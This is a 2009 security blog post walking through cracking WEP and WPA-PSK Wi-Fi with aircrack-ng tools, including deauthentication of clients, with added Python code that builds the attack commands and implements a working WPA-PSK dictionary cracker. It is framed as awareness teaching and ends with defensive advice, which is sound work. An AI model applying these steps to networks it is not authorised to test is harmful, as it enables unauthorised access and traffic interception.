
Saturday, December 12, 2009

The Story of a Hack - Introduction

Over the next few posts throughout November I’ll be doing something slightly different. I’ll be demonstrating the penetration into a fictitious company called HackMe Ltd.

The goal of this series of posts is to demonstrate how simple it is to penetrate a network, steal some data, and then erase the evidence of the intrusion. I’ll also be including details of what measures could have been taken to prevent or detect the attack. I want to keep things simple but still as realistic as possible.

Throughout the story I'll be using common, simple techniques to footprint, scan and penetrate my target. After gaining access, wherever possible I want to use only the native tools on the compromised systems to find and retrieve my data.


This set of posts is written to educate the reader, and hopefully to increase security awareness.


Setting the Scene

So I’ve been given my Target. HackMe Ltd is a popular hobbyist magazine distribution company. My job is to steal the customer database and the accounts database. I must find a way in, get the data and get out, leaving as little evidence as possible.


Part 1 - Reconnaissance

Part 2 - Breaking In

Part 3 - Kung Fu Shopping


I hope anyone reading this enjoys these posts and I welcome comments and feedback.

Wireless Network Penetration with BACKTRACK

The purpose of this blog post is to list the tools used and steps followed for breaking into a wireless network protected with WEP or WPA-PSK encryption. Hopefully this blog post will help the reader recognise how trivial it is to bypass WEP encryption or WPA-PSK encryption protected with a weak password.

The steps followed below and the tools used can also be employed to break WPA-PSK encryption that utilizes weak passwords or pass-phrases. I shall point out the changes necessary to break WPA-PSK where appropriate.

The network that was penetrated in this example was my own network, however the encryption and setup were the same as what would usually be found on most wireless networks.

Tools

  • airodump-ng
  • aireplay-ng
  • aircrack-ng
  • Wireless Assistant


The Attack

1. I first run airodump-ng to identify the networks I can see. This also makes sure my card is configured correctly.

airodump-ng wlan0



I see from the output that it correctly identifies my wireless network "joker" on channel 3 and provides the BSSID (we need this for later).

If my card wasn't correctly set up (i.e. in monitor mode) I could either run airmon-ng (airmon-ng start wlan0, which on newer drivers creates a separate monitor interface such as mon0) or set it up manually as detailed below:

ifconfig wlan0 down
ifconfig wlan0 promisc
iwconfig wlan0 mode monitor
ifconfig wlan0 up

Then I would use ifconfig and iwconfig to make sure the settings were correct.

2. I now run airodump-ng with switches telling it to collect only the Initialization Vectors (IVs) on channel 3 and write them to a file, using my wireless interface (wlan0):

airodump-ng --ivs -c 3 -w wepdump wlan0



This produces two files, wepdump-01.txt and wepdump-01.ivs. The .ivs file is the one I am interested in; the .txt file is a CSV summary of the access points and stations seen during the capture.

When capturing data to break WPA-PSK do not use the --ivs switch: the entire packets need to be captured, because what aircrack-ng needs is the four-way handshake between the client and the AP, not IVs. If the client is already associated, force it to re-associate (and so repeat the handshake) by deauthenticating it with aireplay-ng, using the following syntax:

aireplay-ng -0 1 -a {AP BSSID} -c {client MAC} wlan0

To obtain the AP BSSID and the client MAC addresses I use Kismet, though airodump-ng also lists the associated stations under each AP in its own output.


Note: when collecting the IV's having the best signal possible will speed things up.
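The summary file airodump-ng writes beside the capture is the quickest place to pull the BSSID, channel and associated client MACs from when scripting the steps above. The parser below is an added example, not code from the original post or from the aircrack-ng project; it assumes the CSV layout airodump-ng writes (the file is named .txt on BackTrack 3 era builds and .csv on current releases), and every MAC address, timestamp and counter in the embedded sample is constructed for the example. It also assembles the airodump-ng, aireplay-ng and aircrack-ng command lines, applying the WEP/WPA-PSK differences the post describes (--ivs only for WEP, whole frames plus a wordlist for WPA-PSK).

```python
import csv
import io
import re

# Constructed sample of the summary file airodump-ng writes next to the capture.
# MAC addresses, timestamps and counters below are made up for this example.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:18:F8:4B:43:86, 2009-12-12 10:01:03, 2009-12-12 10:16:10, 3, 54, WEP, WEP, OPN, -41, 812, 31042, 0.0.0.0, 5, joker, 
00:1D:7E:AA:BB:CC, 2009-12-12 10:01:05, 2009-12-12 10:16:09, 6, 54, WPA2, CCMP, PSK, -67, 790, 0, 0.0.0.0, 6, office, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:1E:C2:11:22:33, 2009-12-12 10:01:07, 2009-12-12 10:16:10, -38, 4120, 00:18:F8:4B:43:86, joker
00:21:5C:44:55:66, 2009-12-12 10:02:30, 2009-12-12 10:15:58, -70, 233, 00:1D:7E:AA:BB:CC, office
"""


def _parse_section(section):
    """Turn one CSV section (header row followed by data rows) into a list of dicts."""
    rows = list(csv.reader(io.StringIO(section), skipinitialspace=True))
    header = [h.strip() for h in rows[0]]
    # zip() drops the empty trailing field airodump-ng leaves after the Key column
    return [dict(zip(header, (v.strip() for v in row))) for row in rows[1:] if any(row)]


def parse_airodump_csv(text):
    """Return (access_points, stations) from an airodump-ng summary file.
    The two sections are separated by a blank line. ESSIDs containing commas
    are not handled, since airodump-ng does not quote them."""
    ap_section, station_section = re.split(r"\n\s*\n", text.strip(), maxsplit=1)
    return _parse_section(ap_section), _parse_section(station_section)


def find_ap(aps, essid):
    return next((ap for ap in aps if ap["ESSID"] == essid), None)


def clients_of(stations, bssid):
    """Station MACs seen associated with the given AP; these are the -c targets for a deauth."""
    return [s["Station MAC"] for s in stations if s["BSSID"] == bssid]


def capture_command(ap, iface, prefix):
    """airodump-ng invocation: --ivs is only useful for WEP; WPA-PSK needs the whole
    handshake frames, so it is omitted there. --bssid restricts the capture to one AP."""
    cmd = ["airodump-ng"]
    if ap["Privacy"].startswith("WEP"):
        cmd.append("--ivs")
    return cmd + ["-c", ap["channel"], "--bssid", ap["BSSID"], "-w", prefix, iface]


def deauth_command(ap_bssid, client_mac, iface, count=1):
    """aireplay-ng deauth burst that forces the client to re-associate and repeat the handshake."""
    return ["aireplay-ng", "-0", str(count), "-a", ap_bssid, "-c", client_mac, iface]


def crack_command(ap, prefix, wordlist=None):
    """aircrack-ng invocation: statistical attack on the .ivs file for WEP,
    dictionary attack on the .cap file for WPA-PSK."""
    if ap["Privacy"].startswith("WEP"):
        return ["aircrack-ng", "-b", ap["BSSID"], f"{prefix}-01.ivs"]
    if wordlist is None:
        raise ValueError("WPA-PSK needs a wordlist; there is no statistical attack as for WEP")
    return ["aircrack-ng", "-b", ap["BSSID"], "-w", wordlist, f"{prefix}-01.cap"]


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for essid in ("joker", "office"):
        ap = find_ap(aps, essid)
        print(" ".join(capture_command(ap, "wlan0", "dump")))
        for client in clients_of(stations, ap["BSSID"]):
            print(" ".join(deauth_command(ap["BSSID"], client, "wlan0")))
```

Run against a real summary file by reading it into parse_airodump_csv() instead of SAMPLE_CSV; the Privacy column is what decides between the WEP and WPA-PSK command forms.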


3. After 15 minutes I stop the capture and run the collected IVs through aircrack-ng, specifying the BSSID so that it only considers that network:

aircrack-ng -b 00:18:F8:4B:43:86 wepdump-01.ivs



As you can see it has recovered the 40-bit WEP key: C3:C0:8C:90:3D. A 104-bit key needs more IVs but falls the same way.

If I were cracking WPA-PSK I would need to specify a dictionary file with the -w switch; the attack only succeeds if the passphrase is in that file, which is what "weak password" means here. My syntax would therefore look like this:

aircrack-ng -b 00:18:F8:4B:43:86 -w big-dictionary-file wpadump-01.cap
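What aircrack-ng does with that dictionary is worth seeing in code, because it explains both why a weak passphrase falls and why a long random one does not. The block below is an added example, not code from the original post or from aircrack-ng: it implements the 802.11i key schedule (PBKDF2-HMAC-SHA1 with the SSID as salt to get the PMK, PRF-512 to get the PTK, and the KCK-keyed MIC over the EAPOL-Key frame) and tries each wordlist entry against a captured MIC. There is no capture file here; make_handshake() constructs a stand-in handshake (made-up client MAC and nonces, a skeleton message-2 frame) with a MIC computed from the real key schedule, so the cracking loop has something genuine to verify against.

```python
import hashlib
import hmac


def wpa_pmk(passphrase, ssid):
    """802.11i PSK mapping: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The SSID is the salt, so precomputed tables only work for one network name, and the
    4096 rounds are why CPU cracking is limited to a few thousand candidates per second."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """PRF-512 from 802.11i: four HMAC-SHA1 blocks, truncated to 64 bytes of keying material."""
    return b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )[:64]


def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA) ||
    min(ANonce,SNonce) || max(ANonce,SNonce)). Its first 16 bytes are the KCK,
    the key for the MIC on the EAPOL-Key frames."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame, wpa2=True):
    """MIC over the EAPOL-Key frame with its own MIC field zeroed:
    HMAC-SHA1 truncated to 16 bytes for WPA2 (CCMP), HMAC-MD5 for WPA (TKIP)."""
    if wpa2:
        return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]
    return hmac.new(kck, eapol_frame, hashlib.md5).digest()


def crack_psk(ssid, ap_mac, client_mac, anonce, snonce, eapol_frame, mic, wordlist, wpa2=True):
    """The per-candidate work behind aircrack-ng -w: PBKDF2 -> PTK -> KCK -> MIC, then compare.
    Returns the passphrase that reproduces the captured MIC, or None if it is not in the list."""
    for candidate in wordlist:
        kck = derive_ptk(wpa_pmk(candidate, ssid), ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame, wpa2), mic):
            return candidate
    return None


def make_handshake(passphrase, ssid, wpa2=True):
    """Constructed stand-in for a captured handshake (not a real capture): fixed MACs and
    nonces plus a skeleton message-2 EAPOL-Key frame with the MIC field zeroed. The MIC
    is computed from the real key schedule so crack_psk() has a genuine target."""
    ap_mac = bytes.fromhex("0018f84b4386")      # the BSSID from the post
    client_mac = bytes.fromhex("001ec2112233")  # made up
    anonce = bytes(range(32))                   # made up, fixed for reproducibility
    snonce = bytes(range(32, 64))
    # Made-up frame body: EAPOL header, key info/length, replay counter, SNonce, then the
    # zeroed IV/RSC/ID/MIC/length fields a real message 2 carries.
    eapol_frame = bytes.fromhex("0103007502010a00") + bytes(8) + snonce + bytes(16 + 8 + 8 + 16 + 2)
    kck = derive_ptk(wpa_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    return ap_mac, client_mac, anonce, snonce, eapol_frame, eapol_mic(kck, eapol_frame, wpa2)


if __name__ == "__main__":
    handshake = make_handshake("joker123", "joker")
    print(crack_psk("joker", *handshake, ["password", "letmein", "joker123"]))
```

Each candidate costs 4096 HMAC-SHA1 rounds, so the loop is bounded by the size of the wordlist, not by any weakness in the protocol: a passphrase that is not in the list is simply never tried.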


4. I now reconfigure my wireless card to connect to the wireless network.



Currently the card is in monitor mode, so I reconfigure it using the following commands:

ifconfig wlan0 down
ifconfig wlan0 -promisc
iwconfig wlan0 mode managed
ifconfig wlan0 up

Once reconfigured I quickly check I can see the target network using:

iwlist scan


5. I now use the Wireless Assistant to connect to the target network with the recovered key.




6. After Connecting to the target network I check my network & wireless settings and test connectivity to the web.



Now that I have an IP address on this network I can use the connection to reach the Internet, attack other hosts on the wireless network, or capture the web traffic of the other clients and do interesting things with that.


Conclusion

WEP encryption is very broken; the key above fell out of 15 minutes of passively captured traffic. Use it only as a last resort, when no other encryption is available, and otherwise use WPA-PSK (WPA2 where the hardware supports it) with a long, random passphrase: the WPA-PSK attack shown here is a dictionary attack, so a passphrase that appears in no wordlist is not recovered by it. If you do have to use WEP, add further layers of security such as MAC address filtering, a hidden SSID, fixed IPs or a limited DHCP scope. These additional measures can all be bypassed (MAC addresses and SSIDs are visible in the traffic captured above), but they make the attacker's job that little bit harder.


Thanks to the guys at Remote Exploit for putting together BackTrack. BackTrack3 Kicks Ass!!!

